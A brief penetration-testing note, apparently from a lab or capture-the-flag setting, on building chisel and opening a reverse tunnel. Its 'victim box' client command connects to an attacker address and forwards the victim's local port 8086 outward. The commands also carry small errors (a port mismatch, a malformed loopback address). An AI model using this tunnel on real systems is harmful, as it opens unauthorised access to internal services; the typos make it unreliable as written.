Reverse tunnel with chisel

to install chisel

  1. git clone git@github.com:jpillora/chisel.git
  2. CGO_ENABLED=0 go build to build chasel as static binary
  • In the attacker box ./chisel server -p 9090 --reverse
  • In the victim box ./chisel client 10.10.14.6 -p 9000 R:8086:127.0.01:8086